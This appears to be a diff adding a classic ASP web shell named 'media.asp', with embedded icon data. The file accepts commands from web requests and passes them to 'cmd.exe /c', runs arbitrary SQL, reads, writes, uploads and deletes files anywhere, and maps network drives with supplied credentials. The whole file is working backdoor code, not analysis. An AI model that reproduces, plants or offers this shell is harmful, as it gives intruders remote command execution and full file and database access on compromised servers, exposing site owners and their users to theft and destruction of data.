+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U"&_
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo"&_
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31"&_
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4"&_
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP"&_
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz"&_
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ"&_
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io"&_
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&_
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&_
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&_
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&_
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&_
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&_
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz"&_
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM"&_
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC"&_
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj"&_
+"yAsokBkQADs="
+
+'*************************  media.asp  *************************
+
+
+sub ErrHandle(rspText)
+Dim myError
+    if Err.Number<>0 then
+		set js = new JSON
+
+		set myError = server.createObject("scripting.dictionary")
+			with myError
+				.add "error", err.number
+				.add "errorDesc", err.Description
+			end with
+
+		Response.Write rspText &" = {"
+		Response.Write js.toJSON("error", myError, true)
+		Response.Write ","
+		Response.Write ajaxInfo()
+		Response.Write "};"
+		Response.End
+    end if
+end sub
+
+sub ajaxExplorer()
+	on error resume next
+	Dim infoList, dirList, fList
+	infoList = ajaxInfo()
+	dirList = filesfoldersList()
+
+	Response.Write "lstResponse = {"
+	Response.Write infoList
+	Response.Write ","
+	Response.Write dirList
+	Response.Write "};"
+end sub
+
+function ajaxInfo()
+	on error resume next
+	Dim myInfo
+	set js = new JSON
+
+	set myInfo = server.createObject("scripting.dictionary")
+		with myInfo
+			.add "path", folderLocation
+			.add "filepath", FilePath
+		end with
+
+	ajaxInfo = js.toJSON("info", myInfo, true)
+end function
+
+function ajaxMapDriver()
+	on error resume next
+	Dim objNetwork, myInfo, driverLetter, remoteShare, userName, password
+
+	driverLetter = Request("driverLetter")
+	remoteShare = Request("remoteShare")
+	userName = Request("userName")
+	password = Request("password")
+
+
+	set js = new JSON
+	set myInfo = server.createObject("scripting.dictionary")
+
+	Set objNetwork = CreateObject("WScript.Network")
+	objNetwork.MapNetworkDrive driverLetter & ":", remoteShare, True, userName, password
+	if Err.Number <> 0 then
+		myInfo.add "error", Err.Number
+		myInfo.add "errorDesc", Err.Description
+	else
+		myInfo.add "error", 0
+		myInfo.add "errorDesc", ""
+	end if
+	Err.Clear
+
+	with myInfo
+		.add "action", "mapDriver"
+		.add "driverLetter", driverLetter
+		.add "remoteShare", remoteShare
+		.add "msgResponse", "Mapped " & driverLetter & ": to " & remoteShare & " !"
+	end with
+
+	ajaxMapDriver = js.toJSON("action", myInfo, true)
+end function
+
+function ajaxRemoveDriver()
+	on error resume next
+	Dim objNetwork, myInfo, driverLetter
+
+	driverLetter = Request("driverLetter")
+
+	set js = new JSON
+	set myInfo = server.createObject("scripting.dictionary")
+
+	Set objNetwork = CreateObject("WScript.Network")
+	objNetwork.RemoveNetworkDrive driverLetter & ":"
+	if Err.Number <> 0 then
+		myInfo.add "error", Err.Number
+		myInfo.add "errorDesc", Err.Description
+	else
+		myInfo.add "error", 0
+		myInfo.add "errorDesc", ""
+	end if
+	Err.Clear
+
+	with myInfo
+		.add "action", "removeDriver"
+		.add "driverLetter", driverLetter
+		.add "msgResponse", "Driver " & driverLetter & ": removed !"
+	end with
+
+	ajaxRemoveDriver = js.toJSON("action", myInfo, true)
+end function
+
+function ajaxRenameFile()
+	on error resume next
+	Dim fileObject, myInfo, fileName, fileId, newName
+
+	fileName = Request("fileName")
+	fileId = Request("fileId")
+	newName = Request("newName")
+
+	set js = new JSON
+	set myInfo = server.createObject("scripting.dictionary")
+
+	Set fileObject = fso.GetFile(folderLocation & fileName)
+	fileObject.Name = newName
+	if Err.Number <> 0 then
+		myInfo.add "error", Err.Number
+		myInfo.add "errorDesc", "Unable to rename """ & fileName & """ !" & vbCrLF & Err.Description
+	else
+		myInfo.add "error", 0
+		myInfo.add "errorDesc", ""
+	end if
+	Err.Clear
+
+		with myInfo
+			.add "fileId", fileId
+			.add "newName", newName
+			.add "action", "renameFile"
+			.add "fileName", fileName
+			.add "msgResponse", "Renamed """ & fileName & """ to """ & """" & newName & """ !"
+		end with
+
+	ajaxRenameFile = js.toJSON("action", myInfo, true)
+end function
+
+function ajaxRenameFolder()
+	on error resume next
+	Dim fileObject, myInfo, folderName, folderId, newName
+
+	folderName = Request("folderName")
+	folderId = Request("folderId")
+	newName = Request("newName")
+
+	set js = new JSON
+	set myInfo = server.createObject("scripting.dictionary")
+
+	Set fileObject = fso.GetFolder(folderLocation & folderName)
+	fileObject.Name = newName
+	if Err.Number <> 0 then
+		myInfo.add "error", Err.Number
+		myInfo.add "errorDesc", "Unable to rename """ & folderName & """ !"	& vbCrLF & Err.Description
+	else
+		myInfo.add "error", 0
+		myInfo.add "errorDesc", ""
+	end if
+	Err.Clear
+
+		with myInfo
+			.add "folderId", folderId
+			.add "newName", newName
+			.add "action", "renameFolder"
+			.add "folderName", folderName
+			.add "msgResponse", "Renamed """ & folderName & """ to """ & """" & newName & """ !"
+		end with
+
+	ajaxRenameFolder = js.toJSON("action", myInfo, true)
+end function
+
+
+function ajaxCopy()
+	on error resume next
+	Dim myInfo, targetPath, foldersId, filesId, ndir, nfile, dir, file, itemName, itemPath, gMsg
+
+	set js = new JSON
+	set myInfo = server.createObject("scripting.dictionary")
+
+	targetPath=addslash(Request("targetPath"))
+
+	foldersId = Request("foldersId")
+	filesId = Request("filesId")
+
+	ndir=Request("dx").Count
+	nfile=Request("fx").Count
+
+	if (ndir>0) then
+		gMsg="Copying folder(s) to """ & targetPath & """ ..."
+			For Each dir In Request("dx")
+				itemName=dir
+				itemPath=folderLocation & itemName
+				FSO.CopyFolder itemPath, targetPath, true
+				gMsg=gMsg & vbCrLF & "- " & itemName & ": "
+					if Err.Number<>0 then
+						gMsg=gMsg & "error ("  & Err.Description  & ")"
+						Err.Clear
+					else
+						gMsg=gMsg & "success"
+					end if
+			Next
+	end if
+
+	if (nfile>0) then
+		if (ndir>0) then gMsg= gMsg & vbCrLF & vbCrLF
+		gMsg=gMsg & "Copying file(s) to """ & targetPath & """ ..."
+		For Each file In Request("fx")
+				itemName=file
+				itemPath=folderLocation & itemName
+				FSO.CopyFile itemPath, targetPath, true
+				gMsg=gMsg & vbCrLF & "- " & itemName & ": "
+					if Err.Number<>0 then
+						gMsg=gMsg & "error ("  & Err.Description  & ")"
+						Err.Clear
+					else
+						gMsg=gMsg & "success"
+					end if
+		Next
+	end if
+
+	if Err.Number <> 0 then
+		myInfo.add "error", Err.Number
+		myInfo.add "errorDesc", Err.Description	& vbCrLF & gMsg
+	else
+		myInfo.add "error", 0
+		myInfo.add "errorDesc", gMsg
+	end if
+	Err.Clear
+
+		with myInfo
+			.add "action", "copy"
+			.add "foldersId", foldersId
+			.add "filesId", filesId
+			.add "msgResponse", gMsg
+		end with
+
+	ajaxCopy = js.toJSON("action", myInfo, true)
+end function
+
+function ajaxMove()
+	on error resume next
+	Dim myInfo, targetPath, foldersId, filesId, ndir, nfile, dir, file, itemName, itemPath, gMsg
+
+	set js = new JSON
+	set myInfo = server.createObject("scripting.dictionary")
+
+	targetPath=addslash(Request("targetPath"))
+
+	foldersId = ""
+	filesId = ""
+
+	ndir=Request("dx").Count
+	nfile=Request("fx").Count
+
+	if (ndir>0) then
+		gMsg="Moving folder(s) to """ & targetPath & """ ..."
+			For Each dir In Request("dx")
+				itemName=dir
+				itemPath=folderLocation & itemName
+				FSO.MoveFolder itemPath, targetPath
+				gMsg=gMsg & vbCrLF & "- " & itemName & ": "
+					if Err.Number<>0 then
+						gMsg=gMsg & "error ("  & Err.Description  & ")"
+						Err.Clear
+					else
+						gMsg=gMsg & "success"
+						foldersId = foldersId & itemName & "|"
+					end if
+			Next
+	end if
+
+	if (nfile>0) then
+		if (ndir>0) then gMsg= gMsg & vbCrLF & vbCrLF
+		gMsg=gMsg & "Moving file(s) to """ & targetPath & """ ..."
+		For Each file In Request("fx")
+				itemName=file
+				itemPath=folderLocation & itemName
+				FSO.MoveFile itemPath,targetPath
+				gMsg=gMsg & vbCrLF & "- " & itemName & ": "
+					if Err.Number<>0 then
+						gMsg=gMsg & "error ("  & Err.Description  & ")"
+						Err.Clear
+					else
+						gMsg=gMsg & "success"
+						filesId = filesId & itemName & "|"
+					end if
+		Next
+	end if
+
+	if Err.Number <> 0 then
+		myInfo.add "error", Err.Number
+		myInfo.add "errorDesc", Err.Description	& vbCrLF & gMsg
+	else
+		myInfo.add "error", 0
+		myInfo.add "errorDesc", gMsg
+	end if
+
+		with myInfo
+			.add "action", "move"
+			.add "foldersId", foldersId
+			.add "filesId", filesId
+			.add "msgResponse", gMsg
+		end with
+
+	ajaxMove = js.toJSON("action", myInfo, true)
+end function
+
+
+function ajaxDelete()
+	on error resume next
+	Dim myInfo, foldersId, filesId, ndir, nfile, dir, file, itemName, itemPath, gMsg
+
+	set js = new JSON
+	set myInfo = server.createObject("scripting.dictionary")
+
+	foldersId = ""
+	filesId = ""
+
+	ndir=Request("dx").Count
+	nfile=Request("fx").Count
+
+	if (ndir>0) then
+		gMsg="Deleting folder(s) ..."
+			For Each dir In Request("dx")
+				itemName=dir
+				itemPath=folderLocation & itemName
+				FSO.DeleteFolder itemPath,true
+				gMsg=gMsg & vbCrLF & "- " & itemName & ": "
+					if Err.Number<>0 then
+						gMsg=gMsg & "error ("  & Err.Description  & ")"
+						Err.Clear
+					else
+						gMsg=gMsg & "success"
+						foldersId = foldersId & itemName & "|"
+					end if
+			Next
+	end if
+
+	if (nfile>0) then
+		if (ndir>0) then gMsg= gMsg & vbCrLF & vbCrLF
+		gMsg=gMsg & "Deleting file(s) ..."
+		For Each file In Request("fx")
+				Err.Clear
+				itemName=file
+				itemPath=folderLocation & itemName
+				FSO.DeleteFile itemPath,true
+				gMsg=gMsg & vbCrLF & "- " & itemName & ": "
+					if Err.Number<>0 then
+						gMsg=gMsg & "error ("  & Err.Description  & ")"
+						Err.Clear
+					else
+						gMsg=gMsg & "success"
+						filesId = filesId & itemName & "|"
+					end if
+		Next
+	end if
+
+	if Err.Number <> 0 then
+		myInfo.add "error", Err.Number
+		myInfo.add "errorDesc", Err.Description	& vbCrLF & gMsg
+	else
+		myInfo.add "error", 0
+		myInfo.add "errorDesc", gMsg
+	end if
+
+		with myInfo
+			.add "action", "delete"
+			.add "foldersId", foldersId
+			.add "filesId", filesId
+			.add "msgResponse", gMsg
+		end with
+
+	ajaxDelete = js.toJSON("action", myInfo, true)
+end function
+
+function ajaxRunSQL()
+	on error resume next
+	Dim myInfo, connection, command, rHeader
+	dim adoCon, rS
+	dim i,intAffected
+
+	connection=request.form("connection")
+	command=request.form("command")
+	intAffected = -1
+
+	set js = new JSON
+	set myInfo = server.createObject("scripting.dictionary")
+	set adoCon=Server.CreateObject("ADODB.Connection")
+	adoCon.Open connection
+
+	if Err.Number<>0 then
+		myInfo.add "error", Err.Number
+		myInfo.add "errorDesc", Err.Description
+	else
+		set rS=adoCon.Execute(command, intAffected)
+
+		if Err.Number<>0 then
+			myInfo.add "error", Err.Number
+			myInfo.add "errorDesc", Err.Description
+		else
+			myInfo.add "error", 0
+			myInfo.add "errorDesc", ""
+			'myInfo.add "msgResponse", "SQL Command Execute Successful !"
+		end if
+
+		if (rS.Fields.Count>0) then
+			redim rHeader(rS.Fields.Count-1)
+			for i=0 to rS.Fields.Count-1
+				if (rS.Fields(i).Name="") then
+					rHeader(i) = "(No column name)"
+				else
+					rHeader(i) = Server.HtmlEncode(rS.Fields(i).Name)
+				end if
+			next
+		else
+			rS = ""
+			rHeader = ""
+		end if
+	end if
+
+
+	with myInfo
+		.add "action", "runSQL"
+		.add "affected", intAffected
+		.add "header", rHeader
+		.add "data", rS
+	end with
+
+	set rS=nothing
+	set adoCon=nothing
+
+	ajaxRunSQL = js.toJSON("action", myInfo, true)
+end function
+
+function ajaxRunCMD()
+	on error resume next
+	Dim myInfo, command, returnContent
+
+	command=request.form("command")
+	returnContent = ""
+
+	set js = new JSON
+	set myInfo = server.createObject("scripting.dictionary")
+	returnContent = server.createobject("wscript.shell").exec("cmd.exe /c "&command).stdout.readall
+	if Err.Number <> 0 then
+		myInfo.add "error", Err.Number
+		myInfo.add "errorDesc", Err.Description
+	else
+		myInfo.add "error", 0
+		myInfo.add "errorDesc", ""
+	end if
+
+	with myInfo
+		.add "action", "runCMD"
+		.add "returnContent", returnContent
+	end with
+
+	ajaxRunCMD = js.toJSON("action", myInfo, true)
+end function
+
+function ajaxLoadFile()
+	on error resume next
+	Dim myInfo, itemPath, itemContent, f, f1
+
+	itemPath=request.form("itemPath")
+	itemContent = ""
+
+	set js = new JSON
+	set myInfo = server.createObject("scripting.dictionary")
+	set f = FSO.getFile(itemPath)
+
+	if (f.size > 0 and f.size < 512000) then
+		set f1 = FSO.OpenTextFile(itemPath, 1)
+		itemContent = f1.readAll
+	end if
+
+	if Err.Number <> 0 then
+		myInfo.add "error", Err.Number
+		myInfo.add "errorDesc", Err.Description
+	else
+		myInfo.add "error", 0
+		myInfo.add "errorDesc", ""
+	end if
+
+	with myInfo
+		.add "action", "loadFile"
+		.add "itemPath", itemPath
+		.add "itemSize", f.size
+		.add "itemSizeText", FormatSize(f.size)
+		.add "itemContent", itemContent
+	end with
+
+	ajaxLoadFile = js.toJSON("action", myInfo, true)
+end function
+
+
+function ajaxSaveFile()
+	on error resume next
+	Dim myInfo, itemPath, itemContent, saveMode, f1, gMsg
+
+	itemPath=request.form("itemPath")
+	itemContent = request.form("itemContent")
+	saveMode = request.form("saveMode")
+	gMsg = ""
+
+	if(saveMode <> 8) then
+		saveMode = 2
+	end if
+
+	set js = new JSON
+	set myInfo = server.createObject("scripting.dictionary")
+	set f1 = FSO.OpenTextFile(itemPath,saveMode,true,false)
+
+	f1.Write(itemContent)
+	f1.close
+
+	if Err.Number<>0 then
+		gMsg="Unable to write to the file """ & itemPath & """, an error occured..."
+	else
+		gMsg="File saved !"
+	end if
+
+	if Err.Number <> 0 then
+		myInfo.add "error", Err.Number
+		myInfo.add "errorDesc", Err.Description	& vbCrLF & gMsg
+	else
+		myInfo.add "error", 0
+		myInfo.add "errorDesc", ""
+	end if
+
+	with myInfo
+		.add "action", "saveFile"
+		.add "saveMode", saveMode
+		.add "itemPath", itemPath
+	end with
+
+	ajaxSaveFile = js.toJSON("action", myInfo, true)
+end function
+
+function ajaxNewFile()
+	on error resume next
+	Dim myInfo, itemName, itemPath, gMsg, newItem, f1
+
+	itemName=request.form("itemName")
+	itemPath=folderLocation & itemName
+
+	set js = new JSON
+	set myInfo = server.createObject("scripting.dictionary")
+
+	if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+	FSO.CreateTextFile(itemPath)
+	if Err.Number<>0 then
+		gMsg="Unable to create the file """ & itemName & """, an error occured..."
+		myInfo.add "error", Err.Number
+	else
+		gMsg="Created the file """ & itemName & """..."
+		myInfo.add "error", 0
+	end if
+	else
+	gMsg="Unable to create the file """ & itemName & """, there exists a file or a folder with the same name..."
+		myInfo.add "error", 1
+	end if
+
+	if Err.Number <> 0 then
+		myInfo.add "errorDesc", Err.Description	& vbCrLF & gMsg
+	else
+		myInfo.add "errorDesc", gMsg
+	end if
+
+	Set f1 = FSO.GetFile(itemPath)
+
+	newItem = f1.name & "|" & FormatSize(f1.size) & "|" & f1.type & "|" & replace(f1.DateLastModified, "/", "-") & "|" & replace(f1.DateCreated, "/", "-")
+
+	with myInfo
+		.add "action", "newFile"
+		.add "itemName", itemName
+		.add "msgResponse", gMsg
+		.add "newItem", newItem
+	end with
+
+	ajaxNewFile = js.toJSON("action", myInfo, true)
+end function
+
+function ajaxNewFolder()
+	on error resume next
+	Dim myInfo, itemName, itemPath, gMsg, newItem, f1
+
+	itemName=request.form("itemName")
+	itemPath=folderLocation & itemName
+
+	set js = new JSON
+	set myInfo = server.createObject("scripting.dictionary")
+	set newItem = server.createObject("scripting.dictionary")
+
+	if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+	FSO.CreateFolder(itemPath)
+	if Err.Number<>0 then
+		gMsg="Unable to create the folder """ & itemName & """, an error occured..."
+		myInfo.add "error", Err.Number
+	else
+		gMsg="Created the folder """ & itemName & """..."
+		myInfo.add "error", 0
+	end if
+	else
+	gMsg="Unable to create the folder """ & itemName & """, there exists a file or a folder with the same name..."
+		myInfo.add "error", 1
+	end if
+
+	if Err.Number <> 0 then
+		myInfo.add "errorDesc", Err.Description	& vbCrLF & gMsg
+	else
+		myInfo.add "errorDesc", gMsg
+	end if
+
+	Set f1 = FSO.GetFolder(itemPath)
+
+	newItem = f1.name & "|" & replace(f1.DateLastModified, "/", "-") & "|" & replace(f1.DateCreated, "/", "-")
+
+	with myInfo
+		.add "action", "newFolder"
+		.add "itemName", itemName
+		.add "msgResponse", gMsg
+		.add "newItem", newItem
+	end with
+
+	ajaxNewFolder = js.toJSON("action", myInfo, true)
+end function
+
+function filesfoldersList()
+	on error resume next
+	Dim f, fc, f1, counter, counterId, endId, myFolderList(), myFileList(), itemStart, itemEnd, myInfo, totalFiles, totalFolders, counterItems
+
+	set js = new JSON
+	set myInfo = server.createObject("scripting.dictionary")
+	Set f = FSO.GetFolder(folderLocation)
+	call ErrHandle("lstResponse")
+	itemStart=request.form("itemStart")
+
+	if(itemStart = "" or itemStart = "0") then
+		itemStart = 1
+	else
+		itemStart = Cint(itemStart)
+	end if
+
+	itemEnd = itemStart + 199
+
+	if(itemStart = 1) then
+		Set fc = f.SubFolders
+		counter = 1
+
+		Redim myFolderList(0)
+		myFolderList(0) = "noxxxinfo"
+
+		For Each f1 In fc
+			Redim preserve myFolderList(counter)
+				myFolderList(counter) = f1.name & "|" & replace(f1.DateLastModified, "/", "-") & "|" & replace(f1.DateCreated, "/", "-")
+			counter=counter+1
+		Next
+		Session("myFolderList") = myFolderList
+
+		Set fc = f.Files
+		counter = 1
+
+		Redim myFileList(0)
+		myFileList(0) = "noxxxinfo"
+
+		For Each f1 In fc
+			Redim preserve myFileList(counter)
+			myFileList(counter) = f1.name & "|" & FormatSize(f1.size) & "|" & f1.type & "|" & replace(f1.DateLastModified, "/", "-") & "|" & replace(f1.DateCreated, "/", "-")
+			counter=counter+1
+		Next
+		Session("myFileList") = myFileList
+	end if
+
+	totalFolders = UBound(Session("myFolderList"))
+	totalFiles = UBound(Session("myFileList"))
+
+	call ErrHandle("lstResponse")
+
+	Redim myFolderList(0)
+	myFolderList(0) = "noxxxinfo"
+
+	Redim myFileList(0)
+	myFileList(0) = "noxxxinfo"
+	counterItems = 0
+
+	if(itemStart <= totalFolders) then
+		if(totalFolders <= itemEnd) then
+			endId = totalFolders
+		else
+			endId = itemEnd
+		end if
+		counter = 0
+		For counterId = itemStart to endId
+			Redim preserve myFolderList(counter)
+			myFolderList(counter) = Session("myFolderList")(counterId)
+			counter=counter+1
+			counterItems = counterItems + 1
+		Next
+	end if
+
+	if(itemStart + counterItems <= totalFolders + totalFiles) then
+		if(totalFolders + totalFiles <= itemEnd) then
+			endId = totalFiles
+		else
+			endId = itemEnd - totalFolders
+		end if
+		'Response.Write itemStart + counterItems - totalFolders & " - " & endId
+		counter = 0
+		For counterId = itemStart + counterItems - totalFolders to endId
+			Redim preserve myFileList(counter)
+			myFileList(counter) = Session("myFileList")(counterId)
+			counter=counter+1
+			counterItems = counterItems + 1
+		Next
+	end if
+
+	if(itemEnd >= totalFolders + totalFiles) then
+		myInfo.add "finished", true
+	else
+		myInfo.add "finished", false
+	end if
+
+	with myInfo
+		.add "totalFolders", totalFolders
+		.add "totalFiles", totalFiles
+		.add "itemStart", itemStart
+	end with
+
+	filesfoldersList = js.toJSON("status", myInfo, true) & "," & js.toJSON("folders", myFolderList, true) & "," & js.toJSON("files", myFileList, true)
+end function
+
+SELECT CASE mode
+CASE "explorer"
+	ajaxExplorer()
+	Response.end
+
+CASE "mapDriver"
+	Response.Write "actionResponse = {"
+	Response.Write ajaxMapDriver()
+	Response.Write "};"
+	Response.End
+
+CASE "removeDriver"
+	Response.Write "actionResponse = {"
+	Response.Write ajaxRemoveDriver()
+	Response.Write "};"
+	Response.End
+
+CASE "newFile"
+	Response.Write "actionResponse = {"
+	Response.Write ajaxNewFile()
+	Response.Write "};"
+	Response.End
+
+CASE "newFolder"
+	Response.Write "actionResponse = {"
+	Response.Write ajaxNewFolder()
+	Response.Write "};"
+	Response.End
+
+CASE "copy"
+	Response.Write "actionResponse = {"
+	Response.Write ajaxCopy()
+	Response.Write "};"
+	Response.End
+
+CASE "move"
+	Response.Write "actionResponse = {"
+	Response.Write ajaxMove()
+	Response.Write "};"
+	Response.End
+
+CASE "delete"
+	Response.Write "actionResponse = {"
+	Response.Write ajaxDelete()
+	Response.Write "};"
+	Response.End
+
+CASE "runSQL"
+	Response.Write "actionResponse = {"
+	Response.Write ajaxRunSQL()
+	Response.Write "};"
+	Response.End
+
+CASE "runCMD"
+	Response.Write "actionResponse = {"
+	Response.Write ajaxRunCMD()
+	Response.Write "};"
+	Response.End
+
+CASE "loadFile"
+	Response.Write "actionResponse = {"
+	Response.Write ajaxLoadFile()
+	Response.Write "};"
+	Response.End
+
+CASE "saveFile"
+	Response.Write "actionResponse = {"
+	Response.Write ajaxSaveFile()
+	Response.Write "};"
+	Response.End
+
+CASE "renameFile"
+	Response.Write "actionResponse = {"
+	Response.Write ajaxRenameFile()
+	Response.Write "};"
+	Response.End
+
+CASE "renameFolder"
+	Response.Write "actionResponse = {"
+	Response.Write ajaxRenameFolder()
+	Response.Write "};"
+	Response.End
+
+CASE "script"
+	on error resume next
+	Response.contenttype="application/x-javascript"
+	Response.CacheControl = "Public"
+	Response.Write Base64Decode(script)
+	Response.end
+
+CASE "style"
+	on error resume next
+	Response.contenttype="text/css"
+	Response.CacheControl = "Public"
+	Response.Write Base64Decode(media_style)
+	Response.end
+
+CASE "download"
+	on error resume next
+	Dim file
+	Response.Buffer=True
+	file = Request("file")
+	DownloadFile folderLocation & file
+	Response.end
+
+CASE "image"
+	on error resume next
+	Dim imgId
+	Response.ContentType="image/gif"
+	Response.CacheControl = "Public"
+	imgId = Request("imgid")
+	SELECT CASE imgId
+	CASE "loading"
+		Response.BinaryWrite Base64ToBSTR(img_loading)
+	CASE "dir"
+		Response.BinaryWrite Base64ToBSTR(img_dir)
+	CASE "lvup"
+		Response.BinaryWrite Base64ToBSTR(img_lvUp)
+	CASE "txt"
+		Response.BinaryWrite Base64ToBSTR(img_txt)
+	CASE "img"
+		Response.BinaryWrite Base64ToBSTR(img_img)
+	CASE ELSE
+		Response.BinaryWrite Base64ToBSTR(img_unknow)
+	END SELECT
+	Response.end
+
+CASE "view"
+	on error resume next
+	Dim extimg, Fil, imagePath
+	Response.Buffer=True
+	imagePath = Request("imagePath")
+
+	If(Ucase(FSO.GetExtensionName(imagePath)) = "JPG" or Ucase(FSO.GetExtensionName(imagePath)) = "JPEG" or Ucase(FSO.GetExtensionName(imagePath)) = "JPE") Then
+		extimg = "image/jpeg"
+	Elseif(Ucase(FSO.GetExtensionName(imagePath)) = "GIF") Then
+		extimg = "image/gif"
+	Elseif(Ucase(FSO.GetExtensionName(imagePath)) = "BMP") Then
+		extimg = "image/bmp"
+	Else
+		extimg = "image/png"
+	End if
+	Set Fil = FSO.GetFile(imagePath)
+	Response.ContentType=extimg
+	Response.CacheControl = "Public"
+	'Response.AddHeader "Content-Length", Fil.Size
+	Response.BinaryWrite readBinaryFile(Fil.path)
+	Set Fil = Nothing
+	Response.end
+END SELECT
+
+if(mode = "upload") then
+
+dim linkBack
+
+Response.Write "<html>"
+Response.Write "<head>"
+Response.Write "<title>" & aspTitle & "</title>"
+Response.Write "<meta http-equiv=""Content-Type"" content=""text/html; charset=utf-8"">"
+Response.Write "<META HTTP-EQUIV=""Pragma"" CONTENT=""no-cache"">"
+Response.Write "<META HTTP-EQUIV=""Expires"" CONTENT=""-1"">"
+
+Response.Write "<link rel=""stylesheet"" href=""?mode=style"" type=""text/css"" />"
+Response.Write "</head>"
+Response.Write "<body>"
+
+Response.Write "<div align=""center"">"
+Response.Write "<table cellpadding=""2"" cellspacing=""2"" width=""500"">"
+Response.Write "<thead  width=""100%"" align=""center"">"
+Response.Write "	<td class=""kbrtm"" align=""center"" colspan=""2""><b>File Upload</b></td>"
+Response.Write "</thead>"
+
+linkBack = Upload(folderLocation)
+
+Response.Write "<TR><TD align='center' class=""kbrtm""><A href="""& linkBack &""">[Back]</A></TD></TR>"
+Response.Write "</table>"
+Response.Write "</div>"
+
+Response.Write "</body>"
+Response.Write "</html>"
+
+Response.End
+end if
+
+Dim drive_, driversText
+	for each drive_ in FSO.Drives
+		driversText = driversText & "<tr id=""driver" & drive_.DriveLetter & """><td class=""kbrtm"">"
+		driversText = driversText & "<a href="""&FilePath&"#Explorer|"&drive_.DriveLetter&":\"">"
+		if drive_.Drivetype=1 then driversText = driversText & "&nbsp;&nbsp;Floppy Drive"
+		if drive_.Drivetype=2 then driversText = driversText & "&nbsp;&nbsp;Hard Disk"
+		if drive_.Drivetype=3 then driversText = driversText & "&nbsp;&nbsp;Network Drive"
+		if drive_.Drivetype=4 then driversText = driversText & "&nbsp;&nbsp;Cd-Rom"
+		driversText = driversText & " [" & drive_.DriveLetter & ":]</a>"
+		if drive_.Drivetype=3 then driversText = driversText & "&nbsp;&nbsp;<a href=""javascript:removeDriver('" & drive_.DriveLetter & "');"">[Remove]</a>"
+		driversText = driversText &  "</td></tr>"
+	next
+
+Response.Write "<html>"
+Response.Write "<head>"
+Response.Write "<title>" & aspTitle & "</title>"
+Response.Write "<meta http-equiv=""Content-Type"" content=""text/html; charset=utf-8"">"
+Response.Write "<META HTTP-EQUIV=""Pragma"" CONTENT=""no-cache"">"
+Response.Write "<META HTTP-EQUIV=""Expires"" CONTENT=""-1"">"
+
+Response.Write "<link rel=""stylesheet"" href=""?mode=style"" type=""text/css"" />"
+Response.Write "<script src=""?mode=script"" type=""text/javascript""></script>"
+Response.Write "<script type=""text/javascript"">"
+Response.Write "ffList = {"
+Response.Write  ajaxInfo()
+Response.Write "};"
+Response.Write "</script>"
+Response.Write "</head>"
+Response.Write "<body onload=""startLoad()"">"
+
+Response.Write "<div id=""container"" align=""center"">"
+
+Response.Write "<div id=""tblHead"" align=""center""><P>&nbsp;</P>"
+Response.Write "<form onSubmit=""window.location.href = '#Explorer|'+getId('remote').value.addSlash();return false;"" method=""post"">"
+Response.Write "<table cellpadding=""0"" cellspacing=""0""><tr><td style=""background-color:121212"" class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b>Location :</b>&nbsp;&nbsp;&nbsp;</td><td><input name=""remote"" id=""remote"" value='' type=""text"" style=""width:350px;""></td><td><input type=""Submit"" value=""Go &raquo;"" style=""width:50; font-weight:bold;""></td></tr></table>"
+Response.Write "</form>"
+Response.Write "<P>&nbsp;</P>"
+Response.Write "</div>"
+
+Response.Write "<div id=""tblErr"" style=""display:none"" align=""center"">"
+Response.Write "<table cellpadding=""2"" cellspacing=""2"" width=""500"">"
+Response.Write "<thead  width=""100%"" align=""center"">"
+Response.Write "	<td class=""kbrtm"" style=""background-color:121212"" align=""center"" colspan=""2""><b>Error !!!</b></td>"
+Response.Write "</thead>"
+Response.Write "<tbody bgcolor=""#3a3a3a"">"
+Response.Write "<TR>"
+Response.Write "	<TD width=""20%"" class=""kbrtm"" id=""errCode"">&nbsp;</TD>"
+Response.Write "	<TD width=""80%"" class=""kbrtm""><font id=""errDesc"" color=""red"">&nbsp;</font></TD>"
+Response.Write "</TR>"
+Response.Write "</tbody>"
